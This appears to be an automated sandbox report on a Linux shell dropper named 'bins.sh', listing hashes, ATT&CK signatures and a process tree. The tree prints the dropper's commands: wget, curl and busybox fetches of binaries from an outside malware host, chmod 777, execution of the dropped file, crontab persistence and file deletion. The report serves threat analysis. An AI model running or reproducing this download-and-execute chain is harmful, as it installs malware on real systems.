Analysis
-
max time kernel
150s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04/12/2024, 20:25
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
5565dbc3dea88b5efa093bf6f6cb0f2e
-
SHA1
ada37c7b5fc24f816b1750c80b47fabae801eb3d
-
SHA256
5712c96a6f61d81d03e6fadb1ab213cbced525bc1548981318d3dfe47f03c9c6
-
SHA512
664d4bd67a7fe00d7f799a0c89453ea30bbb8ff23b64b8c040465302bb903e609fadb175187f6f272b9aa9282524c827bd17826c1dc1617413ecfd7a979c171b
-
SSDEEP
96:YRJILM9M9M5zkw0wJwhwf0wvLYDYfYz6a/L1VLn7Fb3JHLZxi/TLLufuzuTksJIy:bMi6f0wvUTHaxO5i6f0wV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 818 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c 819 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c -
Renames itself 1 IoCs
pid Process 820 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.FUV38W crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/filesystems crontab File opened for reading /proc/9/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/16/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/684/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/115/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/485/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/828/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/filesystems crontab File opened for reading /proc/12/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/14/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/19/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/79/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/831/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/18/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/23/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/105/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/13/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/144/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/37/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/372/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/705/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/1/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/7/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/2/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/20/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/36/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/73/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/704/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/385/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/6/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/70/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/76/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/317/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/343/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/707/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/74/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/152/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/344/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/408/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/69/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/224/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/311/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/373/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/825/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/17/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/21/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/22/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/78/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/116/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/384/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/829/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/4/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/5/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/15/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/83/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/168/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/703/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/710/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/826/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/3/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/8/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/24/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c File opened for reading /proc/77/cmdline 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 717 wget 731 curl 739 busybox 829 wget 830 curl 831 busybox -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c wget File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c./3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:819 -
/bin/shsh -c "crontab -l"3⤵PID:821
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:822
-
-
-
/bin/shsh -c "crontab -"3⤵PID:823
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:824
-
-
-
-
/bin/rmrm 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵PID:828
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
PID:829
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
PID:830
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
PID:831
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
210B
MD57efe52b2de6e71ac50b770cf32218aac
SHA1ade25d2ddfbbbf690febf439ab6c9be4b484d402
SHA256c81fa91db4d9fa0605ef5576fa0e3bc4fb94f0ece0fa242c1e8fabf826f91d15
SHA512f96c20247d84eed1819b80526f6671b3350cd908be62eda99e9392e0716735ba9b3b43f54bbf314ee1b188cdfb6bc1e21d16f27e10d52ef01b0bb57f3d74604f